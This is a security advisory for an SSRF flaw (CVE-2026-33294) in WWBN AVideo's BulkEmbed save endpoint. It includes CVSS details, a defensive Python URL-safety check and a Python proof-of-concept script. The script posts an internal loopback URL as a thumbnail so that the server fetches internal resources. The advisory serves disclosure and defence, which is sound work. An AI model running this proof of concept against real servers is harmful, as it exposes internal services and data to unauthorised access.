Security Vulnerability Report
CVE-2026-33294 CVSS 5.0 MEDIUM

Published: 2026-03-22 17:17:09
Last Modified: 2026-03-24 21:14:36

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.
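As an added illustration (not AVideo's own `isSSRFSafeURL()` and not code from the advisory), the following Python check shows what a guard placed in front of a fetch like `url_get_contents()` must do with a user-supplied thumbnail URL: restrict the scheme, reject embedded credentials, and refuse any literal or resolved address that is not globally routable. The `resolver` parameter is a hypothetical hook so the DNS step can be exercised offline; the sample addresses below are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical guard written for this note; it is NOT AVideo's isSSRFSafeURL().
# It shows the minimum an SSRF filter must do before a server-side fetch such as
# url_get_contents() is allowed to retrieve a user-supplied thumbnail URL.

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Return every address (as text) the name resolves to; [] on failure."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    # sockaddr[0] is the IP text; strip any IPv6 scope id such as "%eth0".
    return [info[4][0].split("%")[0] for info in infos]


def is_ssrf_safe_url(url, resolver=resolve_host):
    """True only if url is http(s), carries no credentials, and every address
    it points at (literal or resolved) is globally routable."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    if parsed.username is not None or parsed.password is not None:
        return False  # "http://user@host" forms are a classic parser-confusion trick
    try:
        ipaddress.ip_address(parsed.hostname)
        candidates = [parsed.hostname]          # literal IP: check it directly
    except ValueError:
        candidates = resolver(parsed.hostname)  # hostname: check every answer
    if not candidates:
        return False  # unresolvable names are rejected rather than fetched
    for text in candidates:
        addr = ipaddress.ip_address(text)
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        # Loopback, RFC 1918, link-local (169.254.169.254), CGNAT, 0.0.0.0,
        # reserved and multicast ranges are all rejected here.
        if not addr.is_global or addr.is_multicast:
            return False
    return True
```

The fetch that follows a positive check must connect to the address that was checked (pin it) rather than resolve the name a second time, or DNS rebinding reopens the hole.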

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration
target_host = "http://avideo-example.com"
endpoint = "/plugin/BulkEmbed/save.json.php"
url = target_host + endpoint

# Internal resource to access (e.g., local metadata service)
internal_url = "http://127.0.0.1:8080/metadata"

# Valid authentication credentials (required)
cookies = {
    "PHPSESSID": "valid_session_cookie_here"
}

# Payload data
payload = {
    "title": "SSRF Test Video",
    "url": "http://external-video.com/video.mp4",
    "thumbnail": internal_url  # Malicious internal URL
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the video thumbnail image source to see the response from " + internal_url)
    else:
        print("[-] Failed to send request. Status code: " + str(response.status_code))
        print(response.text)
except Exception as e:
    print("[-] Error: " + str(e))
```

References

https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p (Exploit, Vendor Advisory)

NVD Record Details

Vulnerability Status
Analyzed
Weakness
CWE-918 (Server-Side Request Forgery)
CVSS v3.1 (Secondary source)
5.0 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (exploitability 3.1, impact 1.4)
CVSS v3.1 (Primary source)
4.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (exploitability 2.8, impact 1.4)
The two vectors differ only in Scope (S:C versus S:U), which accounts for the 5.0 versus 4.3 base score.
Affected Configuration
cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*, versionEndExcluding 26.0 (matchCriteriaId B468F0CE-E5E7-4607-BD15-B5763C47493E)